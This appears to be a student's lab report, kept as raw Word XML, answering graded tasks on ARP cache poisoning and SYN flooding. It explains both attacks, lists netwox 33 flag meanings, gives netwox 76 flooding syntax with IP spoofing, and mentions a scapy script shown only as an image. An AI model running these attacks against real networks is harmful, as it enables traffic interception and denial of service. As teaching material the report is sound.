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675EA" w14:textId="77777777" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:t>Task 1 (30 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746760A" w14:textId="77777777" w:rsidR="00901A38" w:rsidRPr="006B1D6F" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>1. Describe the mechanism of ARP cache poisoning. (15 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D92B440" w14:textId="6E1A80E4" w:rsidR="00901A38" w:rsidRDefault="00355BAB" w:rsidP="005B0C65">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ARP cache poisoning means to inject a fake information into the ARP cache of the victim. ARP is stateless and does not have encryption. Stateless means that it does not keep track of the sent and replies. So anytime a reply comes in even if it is not for any request, ARP updates the ARP cache which maps the IP to the MAC address of the reply. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CFABEF" w14:textId="7F03A219" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38"/>
    <w:p w14:paraId="496E94B7" w14:textId="27A78572" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38">
      <w:r>
        <w:t>There are three different ways to poison the ARP cache.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B73875" w14:textId="514AF4C1" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00355BAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARP REQUEST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439C8261" w14:textId="0BC871EB" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00355BAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In a request, there is the sender’s IP and sender’s MAC address given. The receiver will update this information in into the ARP cache. Even if it already exists in the ARP cache, it will update the cache with the new information sent from the ARP request. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C6F394" w14:textId="63364C1A" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00355BAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARP REPLY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35126134" w14:textId="1B67F5F1" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00355BAB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When the computer receives an ARP reply, </w:t>
      </w:r>
      <w:r w:rsidR="00F50467">
        <w:t>it takes the information in the reply and updates the cache. ARP is stateless therefore it does not matter that this maybe a spoofed reply not associated with any ARP request. This can update the cache of the target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52DEFC" w14:textId="2770C8BB" w:rsidR="00F50467" w:rsidRDefault="00F50467" w:rsidP="00F50467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ARP Gratuitous Message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560819CE" w14:textId="6594F904" w:rsidR="00F50467" w:rsidRDefault="005B0C65" w:rsidP="00F50467">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>When the computer first join the network, it will send out a broadcast to all other devices with its IP and MAC address. In this type of ARP message, we put our own IP and MAC address on the sender and the receiver side.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F220524" w14:textId="36095FBB" w:rsidR="005B0C65" w:rsidRDefault="005B0C65" w:rsidP="005B0C65">
      <w:r>
        <w:t>This is what an ARP Packet looks like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AA5B5B" w14:textId="5F3A3878" w:rsidR="005B0C65" w:rsidRDefault="005B0C65" w:rsidP="005B0C65">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3590AC87" wp14:editId="27B4D41E">
            <wp:extent cx="3440725" cy="4102100"/>
            <wp:effectExtent l="0" t="0" r="127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41315" cy="4102803"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57954EED" w14:textId="1E5C3275" w:rsidR="005B0C65" w:rsidRDefault="005B0C65" w:rsidP="005B0C65">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00CE1F5E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://en.wikipedia.org/wiki/Address_Resolution_Protocol</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="40EC374B" w14:textId="77777777" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38"/>
    <w:p w14:paraId="7A887F24" w14:textId="77777777" w:rsidR="00290AB9" w:rsidRDefault="00290AB9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1019D551" w14:textId="7BE77BE2" w:rsidR="00901A38" w:rsidRPr="006B1D6F" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2. Describe how to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to poison ARP cache, and explain the meaning of the command line arguments. (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24416BFA" w14:textId="10C0C5F4" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38">
      <w:r>
        <w:t>The victim’s mac address is 08:00:27:00:c4:48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E76DDBC" w14:textId="13FBEA0E" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38">
      <w:r>
        <w:t>The victim’s IP address is 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424ED083" w14:textId="64A1F89F" w:rsidR="00F50467" w:rsidRDefault="00F50467" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34CBCD18" wp14:editId="710C0E42">
            <wp:extent cx="5149214" cy="12573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7" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="7999" b="56007"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5155876" cy="1258927"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7D7FBC" w14:textId="30FAC785" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38">
      <w:r>
        <w:t>The attacker’s REAL IP address is 10.0.24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F301CE2" w14:textId="1FC50C0A" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38">
      <w:r>
        <w:t>The attacker’s FAKE IP address is specified to be 10.0.2.69</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656BA37D" w14:textId="519381FB" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38">
      <w:r>
        <w:t xml:space="preserve">The attacker’s FAKE MAC address is specified to be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aa:bb:cc:dd:ee:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A25550A" w14:textId="72AD8C98" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38">
      <w:r>
        <w:t>We want to map the FAKE IP to the FAKE MAC.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F79470" w14:textId="77777777" w:rsidR="00F50467" w:rsidRDefault="00F50467" w:rsidP="00901A38"/>
    <w:p w14:paraId="4A1944A4" w14:textId="5587E9C9" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F4C38BE" wp14:editId="103828F5">
            <wp:extent cx="5731510" cy="1423035"/>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423035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDA3E9E" w14:textId="5683D405" w:rsidR="006574EC" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidR="006574EC">
        <w:t>to have root privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58511BCC" w14:textId="2B356DAC" w:rsidR="006574EC" w:rsidRDefault="006574EC" w:rsidP="00901A38">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 33 = ARP cache poisoning tool </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676F60DC" w14:textId="282A0861" w:rsidR="006574EC" w:rsidRDefault="006574EC" w:rsidP="00901A38">
      <w:r>
        <w:t>-a = Ethernet source = MAC address of the source machine sending ARP request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E4AE27" w14:textId="7B10D1AE" w:rsidR="00355BAB" w:rsidRDefault="00355BAB" w:rsidP="00901A38">
      <w:r>
        <w:t xml:space="preserve">We specify </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aa:bb:cc:dd:ee:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as the FAKE mac address we want to put into the ARP cache of the victim machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A20B95B" w14:textId="458E45ED" w:rsidR="00901A38" w:rsidRDefault="006574EC" w:rsidP="00901A38">
      <w:r>
        <w:t>-b = Ethernet destination =  MAC address of the destination machine receiving the ARP request (this is the whose ARP cache we want to poison)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1D5EE6" w14:textId="36784172" w:rsidR="006574EC" w:rsidRDefault="006574EC" w:rsidP="00901A38">
      <w:r>
        <w:t>-e = type of ARP method = 1: ARP request type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E738702" w14:textId="214B9198" w:rsidR="006574EC" w:rsidRDefault="006574EC" w:rsidP="00901A38">
      <w:r>
        <w:t>-f = ARP ethernet source = MAC address of the sender’s machine (The MAC address we are pretending to be)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D4597" w14:textId="06597A5C" w:rsidR="006574EC" w:rsidRDefault="006574EC" w:rsidP="00901A38">
      <w:r>
        <w:t>-g = ARP IP source = The IP Address of the sender’s machine (The IP address we are pretending to be from)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB365EA" w14:textId="6E94BF4A" w:rsidR="006574EC" w:rsidRDefault="006574EC" w:rsidP="00901A38">
      <w:r>
        <w:t>-I = ARP IP destination = The IP Address of the destination’s machine ( The IP address of the machine who’s ARP cache we want to poison)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466B149B" w14:textId="77777777" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38"/>
    <w:p w14:paraId="6DFEC1D1" w14:textId="77777777" w:rsidR="00290AB9" w:rsidRDefault="00290AB9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD774BC" w14:textId="219F0E92" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3. Screenshot of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>arp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> table to show the change before and after your attack. (5 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388F9379" w14:textId="02F4A306" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E1ECA5C" wp14:editId="57BA5015">
            <wp:extent cx="6464300" cy="4385212"/>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93052" cy="4404716"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B320426" w14:textId="28D61C45" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38"/>
    <w:p w14:paraId="39073D36" w14:textId="77777777" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38"/>
    <w:p w14:paraId="236603FE" w14:textId="6311A51A" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:t>ALTERNATIVELY USING SCAPY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146A0D96" w14:textId="374D1935" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B863200" wp14:editId="16391872">
            <wp:extent cx="5731510" cy="4129405"/>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129405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CCCAE4" w14:textId="72ADFA39" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:t>Saved as arp1.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4397E804" w14:textId="17654190" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="276B9D5D" wp14:editId="5E8C5C74">
            <wp:extent cx="5216390" cy="8288977"/>
            <wp:effectExtent l="0" t="0" r="381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9413" cy="8293781"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2290F7AC" w14:textId="60A14ABC" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:r>
        <w:t xml:space="preserve">As you can see on the last line, the fake IP address 10.0.2.69 is mapped to the fake MAC address </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aa:bb:cc:dd:ee:ff</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the ARP cache of machine2 with IP 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ACC7F5" w14:textId="77777777" w:rsidR="00901A38" w:rsidRDefault="00901A38" w:rsidP="00901A38"/>
    <w:p w14:paraId="407FC810" w14:textId="4A11C533" w:rsidR="00901A38" w:rsidRDefault="00505F46" w:rsidP="00901A38">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00901A38">
        <w:lastRenderedPageBreak/>
        <w:t>Task 2 (40 marks):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012AE149" w14:textId="77777777" w:rsidR="00901A38" w:rsidRPr="006B1D6F" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>1. Describe the mechanism of SYN Flooding Attack. (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65116E55" w14:textId="02537EA9" w:rsidR="00901A38" w:rsidRDefault="00D33A7F" w:rsidP="006B1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Before the completion of the three-way handshake, the servers stores all half-open connections in a queue with limited capacity. In SYN Flooding Attack, we quickly fill up this queue so that there is no more space to accept new SYN packets, thus no one will be able to connect this the target’s machine anymore. There are two main tasks in SYN flooding attack, first is to continuously and quickly send many SYN packets to the server, and second is to not finish the third step of the three way handshake. In SYN flooding attack, it is important for the attacker to use a bunch of random source IP addresses in order to prevent being blocked by the firewall. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> tool 76 can help achieve the SYN flooding attack. The command news to be executed using root privileges. The attack does not have a high CPU usage. The server is still fully functional except it has no more space for more SYN packets. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62253B2A" w14:textId="77777777" w:rsidR="006574EC" w:rsidRDefault="006574EC" w:rsidP="006B1D6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68C2914A" w14:textId="77777777" w:rsidR="00901A38" w:rsidRPr="006B1D6F" w:rsidRDefault="00901A38" w:rsidP="00901A38">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Describe how to use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B1D6F">
        <w:rPr>
          <w:color w:val="1F4E79" w:themeColor="accent5" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool to attack, and explain the meaning of the command line arguments. (10 marks)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4CA418" w14:textId="52F93261" w:rsidR="00901A38" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:t xml:space="preserve">Step 1: Find the IP of the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0E910D" w14:textId="763AAB5D" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C2CE36" wp14:editId="1FEA2FDB">
            <wp:extent cx="5731510" cy="2717165"/>
            <wp:effectExtent l="0" t="0" r="0"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43CD0193" w14:textId="2431632A" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>inet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.0.2.6 is the IP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>addres</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of the server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B619C7" w14:textId="4BD30235" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38"/>
    <w:p w14:paraId="6E43D388" w14:textId="77777777" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:t>Step 2: check which port Server uses to connect with client. Client IP address in this case is 10.0.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79087CEC" w14:textId="015D2AE9" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D4D4C17" wp14:editId="3016039A">
            <wp:extent cx="4998681" cy="3645725"/>
            <wp:effectExtent l="0" t="0" r="5715"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9918" cy="3653921"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAF3EE4" w14:textId="5794F8DF" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CB8FBEF" wp14:editId="331BC7F6">
            <wp:extent cx="5731510" cy="146240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462405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="091C5942" w14:textId="77F121DB" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:t>Netstat -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tna</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> command shows the state of connection as “ESTABLISHED”. This means that the server (10.0.2.5) connected with client (10.0.2.6) via the port 23. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78ACB8CE" w14:textId="153AA68F" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38"/>
    <w:p w14:paraId="061468D6" w14:textId="7E0E6B61" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:t>Step 3: Attacker can attack this port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3A7542" w14:textId="30B4BD69" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:t>This shows before and after the attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B60D6" w14:textId="77777777" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73BD3ACF" wp14:editId="0D2FCE6A">
            <wp:extent cx="5731510" cy="3148965"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="9" name="Picture 9"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screen&#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48965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FCED14" w14:textId="77777777" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38"/>
    <w:p w14:paraId="4ECE9088" w14:textId="2384B3AD" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:t>This is the command</w:t>
      </w:r>
      <w:r w:rsidR="00B63B7A">
        <w:t xml:space="preserve"> line</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the attacker can use for SYN flooding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B2A29" w14:textId="671FECDC" w:rsidR="00515407" w:rsidRDefault="00515407" w:rsidP="00901A38">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2544BA67" wp14:editId="015D272E">
            <wp:extent cx="573151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47700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E47A6BD" w14:textId="2DD46EBD" w:rsidR="00B63B7A" w:rsidRDefault="00B63B7A" w:rsidP="00901A38">
      <w:r>
        <w:t xml:space="preserve">How to use: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>netwox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 76 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p port [-s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>spoofip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163FE8E4" w14:textId="60279063" w:rsidR="00901A38" w:rsidRDefault="00515407" w:rsidP="00B63B7A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
